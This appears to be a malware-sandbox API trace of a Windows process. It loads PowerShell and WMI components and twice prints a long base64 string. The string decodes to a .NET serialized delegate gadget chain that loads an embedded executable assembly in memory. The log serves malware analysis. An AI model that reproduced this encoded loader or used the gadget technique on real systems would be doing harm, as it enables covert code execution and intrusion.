	[0054.117] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027d690 | out: ppv=0x350027d690*=0x233e121be18) returned 0x0
	[0054.154] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027d690 | out: ppv=0x350027d690*=0x233e121be18) returned 0x0
	[0054.154] MulDiv (nNumber=405, nNumerator=100, nDenominator=1516) returned 27
	[0054.155] SysStringLen (param_1=0x0) returned 0x0
	[0054.798] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
	[0054.798] CoUninitialize () 
	[0055.075] SysStringLen (param_1="AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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") returned 0xa970
	[0055.082] SysStringLen (param_1="AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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") returned 0xa970
	[0055.085] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x350027c558 | out: ppsaOut=0x350027c558) returned 0x0
	[0055.086] SafeArrayAllocData (psa=0x233e3979020) returned 0x0
	[0055.087] SysStringLen (param_1=0x0) returned 0x0
	[0055.133] SafeArrayGetVartype (in: psa=0x233e3979020, pvt=0x350027c580 | out: pvt=0x350027c580) returned 0x0
	[0055.144] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x350027c538 | out: ppsaOut=0x350027c538) returned 0x0
	[0055.144] SafeArrayAllocData (psa=0x233e3978c60) returned 0x0
	[0055.145] SysStringLen (param_1=0x0) returned 0x0
	[0055.213] SysStringLen (param_1=0x0) returned 0x0
	[0055.253] SysStringLen (param_1=0x0) returned 0x0
	[0055.860] SafeArrayAllocDescriptorEx (in: vt=0xc, cDims=0x1, ppsaOut=0x350027d1b8 | out: ppsaOut=0x350027d1b8) returned 0x0
	[0055.861] SafeArrayAllocData (psa=0x233e3979560) returned 0x0
	[0055.861] GetTickCount () returned 0x20824
	[0056.628] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0056.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.629] CoTaskMemFree (pv=0x233e39140d0) 
	[0056.635] GetVersionExW (in: lpVersionInformation=0x3500279a90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3500279a90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0056.636] GetVersionExW (in: lpVersionInformation=0x3500279a90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3500279a90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0056.643] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0056.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.643] CoTaskMemFree (pv=0x233e39140d0) 
	[0056.669] CoTaskMemAlloc (cb=0x104) returned 0x233e39140d0
	[0056.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39140d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.669] CoTaskMemFree (pv=0x233e39140d0) 
	[0056.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0x3500279720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0056.759] GetVersionExW (in: lpVersionInformation=0x3500279840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3500279840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0056.759] SetErrorMode (uMode=0x1) returned 0x8001
	[0056.760] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0x35002799a0 | out: lpFileInformation=0x35002799a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0056.761] SetErrorMode (uMode=0x8001) returned 0x1
	[0057.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x3500279800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
